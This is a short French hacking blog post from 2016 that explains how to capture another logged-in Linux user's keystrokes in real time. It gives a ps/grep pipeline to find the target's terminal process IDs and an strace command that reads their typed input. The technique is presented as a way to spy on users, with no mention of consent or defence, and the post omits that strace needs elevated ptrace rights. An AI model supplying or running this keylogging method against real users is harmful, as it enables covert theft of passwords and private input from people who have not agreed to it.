Dyrk.org
Do You Really Know

[Hack – Linux] – Récupérez les frappes clavier en live d’un utilisateur linux

Publié le 11 janvier 2016 par #Ro0t

 

Salut à tous, et excellent début de semaine !

 

Cette semaine on attaque en douceur avec une petite gourmandise sélectionnée rien que pour vous !

 

 

Nous allons récupérer les touches claviers d’un utilisateur linux, à condition, bien sûr, que celui-ci soit connecté sur la même machine que vous !

 

Pour cela …

 

Etape 1 :

Nous allons donc récupérer l’id d’un processus lié à sa session !

ps ax | grep <nom_utilisateur> |  grep pts | grep -v « grep » | cut -d »  » -f1

Capture

 

/!\ Il se peut que l’utilisateur dont vous souhaitiez récupérer les touches clavier, dispose de plusieurs sessions ouvertes….
Auquel cas, vous récupérerez ici plusieurs id …

 

Etape 2 :

 

Une fois que vous disposez de ce ou ces id, il vous faut lancer cette commande ;)

strace -p  <id_processus> 2>&1 | grep  ‘read(10, ‘

Capture

 

 

 

Et voilà les gars, c’est bon vous allez pouvoir pirater la NASA :D